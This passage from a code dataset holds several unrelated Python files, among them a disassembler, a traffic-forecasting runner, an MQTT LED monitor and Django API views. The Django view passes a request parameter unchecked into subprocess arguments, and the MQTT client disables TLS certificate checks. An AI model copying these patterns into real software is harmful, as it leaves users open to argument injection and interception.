Wells without depth or opening data\nWellsNull.filter(regex='TotalDepth|Opening').isnull().all(axis=1).sum()\n# Wells deeper than 200 ft\n((WellsNull['TotalDepth'] > 200) | (WellsNull['OpeningMin'] > 200)).sum()","repo_name":"alemood/TreasureValley","sub_path":"vadose/WaterLevelProc/AnalyzeVadoseZone.py","file_name":"AnalyzeVadoseZone.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28195158987","text":"\"\"\"Instruction type definitions.\"\"\"\n\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, ClassVar, Sequence, Type, TypeVar\n\nfrom k0s_dasm.flow import Forward as FlowForward\nfrom k0s_dasm.util import fmthex\n\nif 
\nif TYPE_CHECKING:\n\tfrom k0s_dasm.base import Field, Flow, Operand, Program\n\n\n_T = TypeVar(\"_T\", bound=\"Instruction\")\n\n\n@dataclass\nclass Instruction:\n\t\"\"\"\n\tDefinition of a 78K/0S instruction mnemonic and its encoding.\n\n\tThere should be one definition (subclass) for each row in the\n\t\"instruction code list\" from the manual.\n\n\tInstruction words are in BIG ENDIAN for consistent reading with the list\n\tin the datasheet, but data words are generally in little endian.\n\t\"\"\"\n\n\tmnemonic: ClassVar[str] = NotImplemented\n\t\"\"\"\n\tClass constant: text representation of the instruction format.\n\n\tThis is in the abstract case, with the names of the operands instead\n\tof the actual values for an instance of the instruction.\n\t\"\"\"\n\n\tmatch: ClassVar[int] = NotImplemented\n\t\"\"\"\n\tClass constant: bits consumed by the instruction.\n\n\tProgram data must match exactly when masked with mmask.\n\t\"\"\"\n\n\tmmask: ClassVar[int] = NotImplemented\n\t\"\"\"Class constant: mask applied to match and data when finding instructions.\"\"\"\n\n\tbytecount: ClassVar[int] = NotImplemented\n\t\"\"\"Class constant: instruction byte count.\"\"\"\n\n\tfield_defs: ClassVar[Sequence[\"Field\"]] = tuple()\n\t\"\"\"Class constant: tuple of Field instances for instruction fields.\"\"\"\n\n\tflow: ClassVar[\"Flow\"] = FlowForward()\n\t\"\"\"Class constant: instruction flow type.\"\"\"\n\n\tformat: ClassVar[str] = NotImplemented\n\t\"\"\"\n\tClass constant: format string with entries for operands.\n\n\tThe format placeholders (i.e. {0}, {1}) will be filled in with the string\n\tfrom rendering that operand, with indices per ``field_defs``.\n\t\"\"\"\n\n\tword: int\n\t\"\"\"Raw instruction word (8-32 bits).\"\"\"\n\n\tpc: int\n\t\"\"\"Address of (the first byte of) this instruction.\"\"\"\n\n\tnext: Sequence[int]\n\t\"\"\"\n\tAddress(es) of the next instruction(s).\n\n\tIn general this is the next sequential instruction in the program. But, if\n\tit's a branch instruction, it will be something different. If it's a\n\tconditional branch, there would be multiple next addresses. If the next\n\taddress is calculated at runtime, then this field may be empty (requiring\n\tmanual intervention).\n\t\"\"\"\n\n\toperands: dict[\"Field\", \"Operand\"]\n\t\"\"\"\n\tOperand values for each defined Field.\n\n\tPreferred order is as per ``field_defs``.\n\t\"\"\"\n\n\tprogram: \"Program\"\n\t\"\"\"The containing Program.\"\"\"\n\n\tnotes: list[str] = field(default_factory=list)\n\t\"\"\"Notes or warnings from analysis.\"\"\"\n
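\t# Illustration of the match/mmask convention that load() checks below
\t# (byte values are invented for the example, not taken from a real
\t# opcode): with match=0x30 and mmask=0xF0, any byte 0x30..0x3F matches
\t# and the low nibble stays free to encode an operand field, while
\t# mmask=0xFF would pin the encoding to the single byte 0x30.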
\n\t@classmethod\n\tdef load(cls: Type[_T], program: \"Program\", pc: int) -> _T | None:\n\t\t\"\"\"\n\t\tAttempt to match the program data at ``pc`` to this instruction def.\n\n\t\tReads ``bytecount`` bytes of ``program.flash`` starting at ``pc`` and\n\t\tchecks them against ``match``/``mmask``; returns None if the data\n\t\tdoes not match this instruction's encoding.\n\t\t\"\"\"\n\t\tpc_next = pc + cls.bytecount\n\t\tdata = program.flash[pc:pc_next]\n\n\t\tif len(data) < cls.bytecount:\n\t\t\treturn None\n\t\tword = int.from_bytes(data[: cls.bytecount], byteorder=\"big\", signed=False)\n\t\tif (word & cls.mmask) != (cls.match & cls.mmask):\n\t\t\treturn None\n\t\t# else, matched.\n\n\t\tfields: dict[Field, Operand] = {}\n\t\tout = cls(\n\t\t\tword=word,\n\t\t\tpc=pc,\n\t\t\tnext=tuple(),\n\t\t\toperands=fields,\n\t\t\tprogram=program,\n\t\t)\n\n\t\tfor fdef in cls.field_defs:\n\t\t\tfields[fdef] = fdef.from_inst_word(word, out)\n\t\tout.next = out.flow.next(out)\n\t\tif not out._check_fields():\n\t\t\treturn None\n\n\t\treturn out\n\n\t# noinspection PyMethodMayBeStatic\n\tdef _check_fields(self) -> bool:\n\t\t\"\"\"\n\t\tCheck if field values are allowed for this definition.\n\n\t\tCalled as part of the match/load process; if False, the match fails.\n\t\t\"\"\"\n\t\treturn True\n\n\t@staticmethod\n\tdef autoload(program: \"Program\", pc: int) -> \"Instruction\":\n\t\t\"\"\"Attempt to match some program data to any instruction subclass.\"\"\"\n\t\ttry:\n\t\t\t# defs live here\n\t\t\timport k0s_dasm.instr  # noqa\n\t\texcept ImportError:\n\t\t\tpass\n\n\t\tresults: list[Instruction] = []\n\t\tfor cls in Instruction.__subclasses__():\n\t\t\tif cls.mnemonic is NotImplemented or cls.match is NotImplemented:\n\t\t\t\tcontinue  # intermediate class\n\t\t\tresult = cls.load(program, pc)\n\t\t\tif result is not None:\n\t\t\t\tresults.append(result)\n\n\t\tdebug_data = program.flash[pc : pc + 4]\n\t\tif len(results) == 0:\n\t\t\traise ValueError(\n\t\t\t\tf\"Could not match instruction data: {fmthex(debug_data)} ...\"\n\t\t\t)\n\t\telif len(results) > 1:\n\t\t\tdebug = \"\\n\\t\".join([result.render() for result in results])\n\t\t\traise RuntimeError(\n\t\t\t\t\"Multiple matches for instruction data! \"\n\t\t\t\tf\"[ {fmthex(debug_data)} ... ] -> \\n\\t{debug}\"\n\t\t\t)\n\n\t\telse:\n\t\t\tresult = results[0]\n\t\t\treturn result\n\n\tdef render(self) -> str:\n\t\t\"\"\"Render instruction mnemonic with field values.\"\"\"\n\t\tren_fields: list[str] = []\n\t\tfor fdef in self.field_defs:\n\t\t\tren_fields.append(self.operands[fdef].render())\n\t\treturn self.format.format(*ren_fields)\n","repo_name":"pixelfelon/78k0s-dasm","sub_path":"k0s_dasm/ibase.py","file_name":"ibase.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"41047053629","text":"import math\nfrom typing import Tuple, Union, Optional\nimport torch\nfrom torch import nn\nimport numpy as np\nfrom basicts.runners.base_runner import BaseRunner\nfrom basicts.utils.registry import SCALER_REGISTRY\nfrom basicts.utils.serialization import load_pkl\nfrom easytorch.utils.dist import master_only\n\n\"\"\"\nRunner for traffic datasets (short-term forecasting datasets).\n- support curriculum learning.\n- metrics:\n    - MAE\n    - RMSE\n    - MAPE\n- evaluate at horizons 3, 6, 12, and overall.\n- users have to implement the \`forward\` function.
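- re-scales predictions and targets with the scaler stored in datasets/<dataset_name>/scaler.pkl before loss and metrics are computed.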
\n\"\"\"\n\nclass TrafficRunner(BaseRunner):\n    \"\"\"runner for traffic datasets: metr-la, pems-bay, pems03, pems04, pems07, pems08.\n    details:\n        - initialize metrics: mae, mape, rmse\n        - define model\n        - build datasets & dataloader\n        - self.iter_per_epoch\n        - train/val iteration, test process.\n    Args:\n        BaseRunner (easytorch.easytorch.runner): base runner\n    \"\"\"\n    def __init__(self, cfg: dict):\n        super().__init__(cfg)\n\n        self.dataset_name = cfg['DATASET_NAME']\n        self.null_val = cfg['TRAIN'].get('NULL_VAL', np.nan)    # different datasets have different null_values. For example, 0.0 in traffic speed dataset, nan in traffic flow dataset.\n        self.dataset_type = cfg['DATASET_TYPE']\n        self.forward_features = cfg['MODEL'].get('FROWARD_FEATURES', None)    # note: the misspelled key 'FROWARD_FEATURES' is kept as-is; it must match the key used in the config files\n        self.target_features = cfg['MODEL'].get('TARGET_FEATURES', None)\n\n        # read scaler for re-normalization\n        self.scaler = load_pkl(\"datasets/\" + self.dataset_name + \"/scaler.pkl\")\n        # define loss\n        self.loss = cfg['TRAIN']['LOSS']\n        # define metric\n        self.metrics = cfg['METRICS'] \n        # curriculum learning for output. Note that this is different from the CL in Seq2Seq archs.\n        self.cl_param = cfg.TRAIN.get('CL', None)\n        if self.cl_param is not None:\n            self.warm_up_epochs = cfg.TRAIN.CL.get('WARM_EPOCHS', 0)\n            self.cl_epochs = cfg.TRAIN.CL.get('CL_EPOCHS')\n            self.prediction_length = cfg.TRAIN.CL.get('PREDICTION_LENGTH')\n\n    def init_training(self, cfg: dict):\n        \"\"\"Initialize training.\n\n        Including loss, training meters, etc.\n\n        Args:\n            cfg (dict): config\n        \"\"\"\n        super().init_training(cfg)\n        for key, value in self.metrics.items():\n            self.register_epoch_meter(\"train_\"+key, 'train', '{:.4f}')\n\n    def init_validation(self, cfg: dict):\n        \"\"\"Initialize validation.\n\n        Including validation meters, etc.\n\n        Args:\n            cfg (dict): config\n        \"\"\"\n        super().init_validation(cfg)\n        for key, value in self.metrics.items():\n            self.register_epoch_meter(\"val_\"+key, 'val', '{:.4f}')\n\n    def init_test(self, cfg: dict):\n        \"\"\"Initialize test.\n\n        Including test meters, etc.\n\n        Args:\n            cfg (dict): config\n        \"\"\"\n\n        super().init_test(cfg)\n        for key, value in self.metrics.items():\n            self.register_epoch_meter(\"test_\"+key, 'test', '{:.4f}')\n\n    @staticmethod\n    def define_model(cfg: dict) -> nn.Module:\n        \"\"\"Define model.\n\n        If you have multiple models, insert the name and class into the dict below,\n        and select it through ```config```.\n\n        Args:\n            cfg (dict): config\n\n        Returns:\n            model (nn.Module)\n        \"\"\"\n        return cfg['MODEL']['ARCH'](**cfg.MODEL.PARAM)\n\n    def build_train_dataset(self, cfg: dict):\n        \"\"\"Build the training dataset.\n\n        Args:\n            cfg (dict): config\n\n        Returns:\n            train dataset (Dataset)\n        \"\"\"\n        raw_file_path = cfg[\"TRAIN\"][\"DATA\"][\"DIR\"] + \"/data.pkl\"\n        index_file_path = cfg[\"TRAIN\"][\"DATA\"][\"DIR\"] + \"/index.pkl\"\n        batch_size = cfg['TRAIN']['DATA']['BATCH_SIZE']\n        dataset = cfg['DATASET_CLS'](raw_file_path, index_file_path, mode='train')\n        print(\"train len: {0}\".format(len(dataset)))\n        \n        self.iter_per_epoch = math.ceil(len(dataset) / batch_size)\n        \n        return dataset\n\n    @staticmethod\n    def build_val_dataset(cfg: dict):\n        \"\"\"Build the validation dataset.\n\n        Args:\n            cfg (dict): config\n\n        Returns:\n            validation dataset (Dataset)\n        \"\"\"\n        raw_file_path = cfg[\"VAL\"][\"DATA\"][\"DIR\"] + \"/data.pkl\"\n        index_file_path = cfg[\"VAL\"][\"DATA\"][\"DIR\"] + \"/index.pkl\"\n        dataset = cfg['DATASET_CLS'](raw_file_path, index_file_path, mode='valid')\n        print(\"val len: {0}\".format(len(dataset)))\n        return dataset\n\n    
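    # Worked example of the schedule implemented in curriculum_learning()
    # below (WARM_EPOCHS=5, CL_EPOCHS=3, PREDICTION_LENGTH=12 are purely
    # illustrative values, not taken from any shipped config):
    #   epochs 1-5  (warm up) -> cl_length = 12 (train on the full horizon)
    #   epochs 6-8            -> cl_length = 1
    #   epochs 9-11           -> cl_length = 2
    #   ... +1 every CL_EPOCHS until cl_length reaches PREDICTION_LENGTH.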
@staticmethod\n    def build_test_dataset(cfg: dict):\n        \"\"\"Build the test dataset.\n\n        Args:\n            cfg (dict): config\n\n        Returns:\n            test dataset (Dataset)\n        \"\"\"\n        raw_file_path = cfg[\"TEST\"][\"DATA\"][\"DIR\"] + \"/data.pkl\"\n        index_file_path = cfg[\"TEST\"][\"DATA\"][\"DIR\"] + \"/index.pkl\"\n        dataset = cfg['DATASET_CLS'](raw_file_path, index_file_path, mode='test')\n        print(\"test len: {0}\".format(len(dataset)))\n        return dataset\n\n    def curriculum_learning(self, epoch: int = None) -> int:\n        \"\"\"calculate task level in curriculum learning.\n\n        Args:\n            epoch (int, optional): current epoch if in training process, else None. Defaults to None.\n\n        Returns:\n            int: task level\n        \"\"\"\n        if epoch is None:\n            return self.prediction_length\n        epoch -= 1\n        # generate curriculum length\n        if epoch < self.warm_up_epochs:\n            # still warm up\n            cl_length = self.prediction_length\n        else:\n            _ = (epoch - self.warm_up_epochs) // self.cl_epochs + 1\n            cl_length = min(_, self.prediction_length)\n        return cl_length\n\n    def forward(self, data: tuple, epoch:int = None, iter_num: int = None, train:bool = True, **kwargs) -> tuple:\n        \"\"\"feed forward process for train, val, and test. Note that the outputs are NOT re-scaled.\n\n        Args:\n            data (tuple): data (future data, history data). [B, L, N, C] for each of them\n            epoch (int, optional): epoch number. Defaults to None.\n            iter_num (int, optional): iteration number. Defaults to None.\n            train (bool, optional): if in the training process. Defaults to True.\n\n        Returns:\n            tuple: (prediction, real_value). [B, L, N, C] for each of them.\n        \"\"\"\n        raise NotImplementedError()\n\n    def train_iters(self, data: Union[torch.Tensor, Tuple], epoch: int, iter_index: int) -> torch.Tensor:\n        \"\"\"Training details.\n\n        Args:\n            data (Union[torch.Tensor, Tuple]): Data provided by DataLoader\n            epoch (int): current epoch.\n            iter_index (int): current iter.\n\n        Returns:\n            loss (torch.Tensor)\n        \"\"\"\n        iter_num = (epoch-1) * self.iter_per_epoch + iter_index\n        prediction, real_value = self.forward(data=data, epoch=epoch, iter_num=iter_num, train=True)\n        # re-scale data\n        prediction = SCALER_REGISTRY.get(self.scaler['func'])(prediction, **self.scaler['args'])\n        real_value = SCALER_REGISTRY.get(self.scaler['func'])(real_value, **self.scaler['args'])\n        # loss\n        if self.cl_param:\n            cl_length = self.curriculum_learning(epoch=epoch)\n            loss = self.loss(prediction[:, :cl_length, :, :], real_value[:, :cl_length, :, :], null_val=self.null_val)\n        else:\n            loss = self.loss(prediction, real_value, null_val=self.null_val)\n        # metrics\n        for metric_name, metric_func in self.metrics.items():\n            metric_item = metric_func(prediction, real_value, null_val=self.null_val)\n            self.update_epoch_meter('train_'+metric_name, metric_item.item())\n        return loss\n
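    # Note: outputs are re-scaled back to the original data range *before*
    # the loss, so the null-value mask (self.null_val) and the curriculum
    # slice in train_iters() both operate on de-normalised values.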
\n    def val_iters(self, data: Union[torch.Tensor, Tuple], train_epoch: int, iter_index: int):\n        \"\"\"Validation details.\n\n        Args:\n            data (Union[torch.Tensor, Tuple]): Data provided by DataLoader\n            train_epoch (int): current epoch if in training process; else None.\n            iter_index (int): current iter.\n        \"\"\"\n        prediction, real_value = self.forward(data=data, epoch=train_epoch, iter_num=None, train=False)\n        # re-scale data\n        prediction = SCALER_REGISTRY.get(self.scaler['func'])(prediction, **self.scaler['args'])\n        real_value = SCALER_REGISTRY.get(self.scaler['func'])(real_value, **self.scaler['args'])\n        # loss\n        mae = self.loss(prediction, real_value, null_val=self.null_val)\n        # metrics\n        for metric_name, metric_func in self.metrics.items():\n            metric_item = metric_func(prediction, real_value, null_val=self.null_val)\n            self.update_epoch_meter('val_'+metric_name, metric_item.item())\n\n    @torch.no_grad()\n    @master_only\n    def test(self, train_epoch: int = None):\n        \"\"\"Test the model.\n\n        Args:\n            train_epoch (int, optional): current epoch if in training process.\n        \"\"\"\n        # test loop\n        prediction = []\n        real_value = []\n        for iter_index, data in enumerate(self.test_data_loader):\n            preds, testy = self.forward(data, epoch=train_epoch, iter_num=None, train=False)\n            prediction.append(preds)\n            real_value.append(testy)\n        prediction = torch.cat(prediction,dim=0)\n        real_value = torch.cat(real_value, dim=0)\n        # re-scale data\n        prediction = SCALER_REGISTRY.get(self.scaler['func'])(prediction, **self.scaler['args'])\n        real_value = SCALER_REGISTRY.get(self.scaler['func'])(real_value, **self.scaler['args'])\n        # summarize the results.\n        ## test performance of different horizon\n        for i in range(12):\n            # For horizon i, only calculate the metrics **at that time** slice here.\n            pred = prediction[:,i,:,:]\n            real = real_value[:,i,:,:]\n            # metrics\n            metric_results = {}\n            for metric_name, metric_func in self.metrics.items():\n                metric_item = metric_func(pred, real, null_val=self.null_val)\n                metric_results[metric_name] = metric_item.item()\n            log = 'Evaluate best model on test data for horizon {:d}, Test MAE: {:.4f}, Test RMSE: {:.4f}, Test MAPE: {:.4f}'\n            log = log.format(i+1, metric_results['MAE'], metric_results['RMSE'], metric_results['MAPE'])\n            self.logger.info(log)\n        ## test performance overall\n        for metric_name, metric_func in self.metrics.items():\n            metric_item = metric_func(prediction, real_value, null_val=self.null_val)\n            self.update_epoch_meter('test_'+metric_name, metric_item.item())\n            metric_results[metric_name] = metric_item.item()\n\n    @master_only\n    def on_validating_end(self, train_epoch: Optional[int]):\n        \"\"\"Callback at the end of validating.\n\n        Args:\n            train_epoch (Optional[int]): current epoch if in training process.\n        \"\"\"\n        if train_epoch is not None:\n            self.save_best_model(train_epoch, 'val_MAE', greater_best=False)\n","repo_name":"zhoujiajuly/copy-basicTS","sub_path":"basicts/runners/base_traffic_runner.py","file_name":"base_traffic_runner.py","file_ext":"py","file_size_in_byte":11125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"42739267975","text":"import urllib3\nfrom utils.GenUtils import read_lines, write_lines\nimport time\nfrom tqdm import tqdm\n\nlink_file = '/Users/sravan/Spotify.txt'\noutfile = '/Users/sravan/SpotifyLinkData.txt'\nsong_links = read_lines(link_file)\n\nhttp = urllib3.PoolManager()\nfin_lines = list()\n\nfor each_link in tqdm(song_links):\n    try:\n        r = http.request('GET', each_link)\n        data = r.data\n        data_s = data.decode()\n        fin_lines.append(data_s)\n    except Exception as e:\n        print(each_link)\n        print(e.__str__())\n        print('\\n====\\n\\n=====\\n')\n\n    time.sleep(1)\n\nwrite_lines(fin_lines, 
outfile)\n","repo_name":"gsravank/ds_algo","sub_path":"problems/adhoc/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"16285202638","text":"import datetime\nimport json\nimport os\nimport time\n\nimport cv2\nimport numpy as np\nimport paho.mqtt.client as mqtt\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nGREEN_START = 65\nGREEN_END = 70\n\nRED_START = 175\nRED_END = 180\n\n\ndef resize_small(image):\n    return cv2.resize(\n        image, dsize=(0, 0), fx=0.2, fy=0.2, interpolation=cv2.INTER_LINEAR\n    )\n\n\ndef extract_rough_led_image(image, h_start, h_end):\n    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n    h, _, _ = cv2.split(hsv)\n\n    h = cv2.inRange(h, h_start, h_end)\n\n    masked_image = cv2.bitwise_and(hsv, hsv, mask=h)\n\n    return cv2.cvtColor(masked_image, cv2.COLOR_BGR2GRAY)\n\n\ndef clean_image(image):\n    kernel = np.ones((20, 20), np.uint8)\n\n    return cv2.morphologyEx(image, cv2.MORPH_OPEN, kernel)\n\n\ndef find_led_lamps(image):\n    _, bin_img = cv2.threshold(image, 20, 255, cv2.THRESH_BINARY)\n    contours, hierarchy = cv2.findContours(\n        bin_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE\n    )\n\n    return contours, hierarchy, bin_img\n\n\ndef post_sensing_value(sensing_value):\n    body = json.dumps(\n        {\n            \"sensor_id\": \"boiler001\",\n            \"sensing_value\": sensing_value,\n            \"timestamp\": int(time.mktime(datetime.datetime.now().timetuple())),\n        }\n    )\n\n    client = mqtt.Client()\n    client.username_pw_set(os.getenv(\"MQTT_USER\"), password=os.getenv(\"MQTT_PASSWORD\"))\n    client.tls_set(tls_version=mqtt.ssl.PROTOCOL_TLSv1_2, ciphers=None)\n    client.tls_insecure_set(True)\n    client.connect(os.getenv(\"MQTT_BROKER_HOST\"), 8883)\n    client.publish(os.getenv(\"MQTT_TOPIC\"), body)\n    client.disconnect()\n\n\ndef detect_light(image, h_start, h_end):\n    rough_img = extract_rough_led_image(image, h_start, h_end)\n    clean_img = clean_image(rough_img)\n    contours, _, _ = find_led_lamps(clean_img)\n\n    return contours\n\n\ndef pick_led(cap):\n    while True:\n        _, frame = cap.read()\n\n        green_contours = detect_light(frame, GREEN_START, GREEN_END)\n        red_contours = detect_light(frame, RED_START, RED_END)\n\n        if len(green_contours) > 0:\n            print(\"Green is detected.\")\n            post_sensing_value(\"green\")\n        elif len(red_contours) > 0:\n            print(\"Red is detected.\")\n            post_sensing_value(\"red\")\n        elif len(green_contours) <= 0 and len(red_contours) <= 0:\n            print(\"Nothing is detected.\")\n        else:\n            print(\"Both are detected.\")\n\n        time.sleep(30)\n\n\ndef testing_sample_img(frame):\n    green_contours = detect_light(frame, GREEN_START, GREEN_END)\n    red_contours = detect_light(frame, RED_START, RED_END)\n\n    if len(green_contours) > 0:\n        print(\"Green is detected.\")\n        post_sensing_value(\"green\")\n    elif len(red_contours) > 0:\n        print(\"Red is detected.\")\n        post_sensing_value(\"red\")\n    elif len(green_contours) <= 0 and len(red_contours) <= 0:\n        print(\"Nothing is detected.\")\n    else:\n        print(\"Both are detected.\")\n\n\ndef main():\n    cap = cv2.VideoCapture(0)\n    time.sleep(3)\n\n    pick_led(cap)\n\n'''\nMEMO: \nYou can try LED detection with sample images (green and red LED).\nPlease uncomment the following main function if you want to try it.\n'''\n# def main():\n#     frame = cv2.imread(\"./img/green_led.jpg\", cv2.IMREAD_COLOR)\n#     testing_sample_img(frame)\n\n\nif __name__ == \"__main__\":\n    
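    # OpenCV stores hue on a 0-179 scale for 8-bit images, so the red mask
    # above (175-180) only covers the upper red band; reds wrapping around
    # to hue ~0 would need a second inRange() mask OR'd in.
    # main() starts the webcam loop; see the MEMO above to run against the
    # sample images instead.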
main()\n","repo_name":"fujitake/smart-building-quick-start-kit","sub_path":"devices/analog-meter-readers/led-meter/led_status_observer.py","file_name":"led_status_observer.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12502731858","text":"from django.http import JsonResponse\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\n\nfrom .serializers import NoteSerializer\nfrom base.models import Note\n\nimport subprocess\nfrom dotenv import load_dotenv, dotenv_values\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n    @classmethod\n    def get_token(cls, user):\n        token = super().get_token(user)\n\n        # Add custom claims\n        token['username'] = user.username # encrypted\n\n        return token\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n    serializer_class = MyTokenObtainPairSerializer\n\n@api_view(['GET'])\ndef getRoutes(request):\n    routes = [\n        '/api/token',\n        '/api/token/refresh',\n        '/api/query'\n    ]\n    return Response(routes)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getNotes(request):\n    user = request.user\n    notes = user.note_set.all()\n    serializer = NoteSerializer(notes, many=True)\n    return Response(serializer.data)\n\ndef index(request):\n    # WARNING: request.GET.get('cmd') flows straight into the subprocess\n    # arguments below, so callers can pass arbitrary flags to the binary.\n    cmd = \"/home/website/backend/base/api/token_erc_20 \" + request.GET.get('cmd')\n    env = dotenv_values(\"/home/website/backend/base/api/env/.env.org1.minter\")\n    print(cmd.split(\" \"))\n    res = subprocess.run(cmd.split(\" \"), env=env, capture_output=True)\n    output = res.stdout.decode().split(\"***\")\n    transaction, result = output[0].strip(\"-> \").rsplit(\".\", 1)[0], \"\"\n    if (res.stderr.decode() == \"\"):\n        result = output[1].strip().replace(\"Result: \", \"\")\n    return JsonResponse({\"action\": transaction.split(\" \")[0], \"transaction\": transaction.split(\" \")[2], \"result\": result, 'error_msg': res.stderr.decode()})","repo_name":"daironghan/django-react-auth","sub_path":"backend/base/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"20733284504","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nfrom scipy import signal\n\n\nspacing=0.001\ndef grid(min, max, gridpoints):\n    grid = np.linspace(min, max, gridpoints, dtype=np.complex128)\n    return grid\n\ndef wavefunc(grid, func, *args):\n    func_vec = np.vectorize(func)\n    return func_vec(grid, *args)+0j\n\ndef potential(grid, func):\n    func_vec = np.vectorize(func)\n    return func_vec(grid)+0j\n\ndef timegrid(max, spacing):\n    timegrid = np.arange(0, max, spacing)\n    return timegrid\n\ndef solver(psi_0, V):\n    psi_0_l = np.roll(psi_0,1)\n    psi_0_u = np.roll(psi_0,-1)\n    psi_0_l[0]=0+0j\n    psi_0_u[-1]=0+0j\n\n    b=spacing\n    psi_t_x = psi_0 + (-1j*b/h_bar)*(((-h_bar**2/(2*m*a**2))*(psi_0_u-2*psi_0+psi_0_l))+np.multiply(psi_0,V))\n    return psi_t_x/np.sqrt((np.sum(np.multiply(np.conj(psi_t_x),psi_t_x))))/2\n\n\nmax_time = 100\nmin_grid = 0\nmax_grid = 1000\ngridpoints = 500\nh_bar=1\nm=1\na = 2\ndef gaussian(x, mu, sig):\n    return 1./(math.sqrt(2.*math.pi)*sig)*np.exp(-np.power((x - mu)/sig, 2.)/2)\n\ndef V(x):\n    return (0.001*(x-500))\n
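# What solver() above computes, spelled out: one explicit-Euler step of the
# time-dependent Schroedinger equation,
#   psi(t+dt) = psi(t) - (i*dt/hbar) * [ -hbar^2/(2*m*a^2) * D2(psi) + V*psi ]
# where D2 is the three-point finite-difference Laplacian built from the
# rolled copies of psi, followed by renormalisation of the wavefunction.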
\nx = grid(min_grid, max_grid, gridpoints)\npsi_0 = signal.windows.gaussian(500, std=10)+0j\n\n\n\nC = potential(x, V)\n\nprint(C.dtype)\nprint(psi_0.dtype)\nprint(x.dtype)\ntimegrid = timegrid(max_time, spacing)\nfor i in range(1000000):\n    psi_0 = solver(psi_0, C)\n\n\n\n\n\n\nprint(psi_0.dtype)\nplt.plot(x, np.power(np.absolute(psi_0),2))\n#plt.plot(x, C)\nplt.show()\n","repo_name":"MZauchner/SchroedingerSolver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18828963480","text":"from SVM.SVC import svc\nfrom numpy import mat\n\n# Three-class classification\n# Classification method: directed acyclic graph (DAG)\n\ndataMat = []  # training set\ntestMat = []  # test set\nfile = open('D:\\\\PycharmProjects\\\\srpProject\\\\data\\\\iris')\ncounter = 0\n\n# For each class, the first 40 samples form the training set, the last 10 the test set\n\n# Read the training set\nfor line in file.readlines():\n    lineArr = line.strip().split(' ')\n    dataMat.append([float(lineArr[1]), float(lineArr[2]), float(lineArr[3]), float(lineArr[4])])\n\n# Read the test set\nfre = open('D:\\\\PycharmProjects\\\\srpProject\\\\data\\\\iris_test')\n\nfor line in fre.readlines():\n    data = line.strip().split(' ')\n    testMat.append([float(data[1]), float(data[2]), float(data[3]), float(data[4])])\n\n# Train (n-1)*n/2 = 3 classifiers\n\n# Configure parameters\nC = 0.8\ntol = 0.01\nmaxIter = 30\nkTup = ['rbf', 0.5]\n\n# setosa vs versicolor\nsvm_sve = svc(dataMat[0:80], [-1] * 40 + [1] * 40, C, tol, maxIter, kTup)\n\n# setosa vs virginica\nsvm_svi = svc(dataMat[0:40] + dataMat[80:120], [-1] * 40 + [1] * 40, C, tol, maxIter, kTup)\n\n# versicolor vs virginica\nsvm_vevi = svc(dataMat[40:120], [-1] * 40 + [1] * 40, C, tol, maxIter, kTup)\n\nresult = 0\ni = 0\n\nfor dataArr in testMat:\n\n    # Decide: setosa or versicolor\n\n    pri1 = svm_sve.predict(dataArr)\n\n    if pri1 < 0:  # predicted: not versicolor\n\n        print(\"predict not versicolor \", end=' ')\n\n        # Decide: setosa or virginica\n        print(i, end=': ')\n        print(\"predict:\", end=\"\")\n\n        pri2 = svm_svi.predict(dataArr)\n\n        if pri2 < 0:  # predicted: setosa\n            print(\"setosa\", end='')\n            if 0 <= i < 10:\n                print(\",prediction RIGHT\")\n                result += 1\n            else:\n                print(\",prediction WRONG\")\n        elif pri2 > 0:  # predicted: virginica\n            print(\"virginica\", end=\"\")\n            if 20 <= i < 30:\n                print(\",prediction RIGHT\")\n                result += 1\n            else:\n                print(\",prediction WRONG\")\n        else:\n            print(\"Error!\")\n\n    elif pri1 > 0:  # predicted: not setosa\n\n        print(\"predict not setosa \", end=' ')\n\n        # Decide: versicolor or virginica\n\n        pri2 = svm_vevi.predict(dataArr)\n\n        print(i, end=': ')\n        print(\"predict:\", end=\"\")\n\n        if pri2 < 0:  # predicted: versicolor\n            print(\"versicolor\", end=\"\")\n            if 10 <= i < 20:\n                print(\",prediction RIGHT\")\n                result += 1\n            else:\n                print(\",prediction WRONG\")\n        elif pri2 > 0:  # predicted: virginica\n            print(\"virginica\", end=\"\")\n            if 20 <= i < 30:\n                print(\",prediction RIGHT\")\n                result += 1\n            else:\n                print(\",prediction WRONG\")\n        else:\n            print(\"Error!\")\n\n    else:\n        print(\"Error!\")\n    i += 1\n\nprint()\nprint(result / 30)\n","repo_name":"HanhengHe/srpProject","sub_path":"SVM/test/2019-8-31/trible_test.py","file_name":"trible_test.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
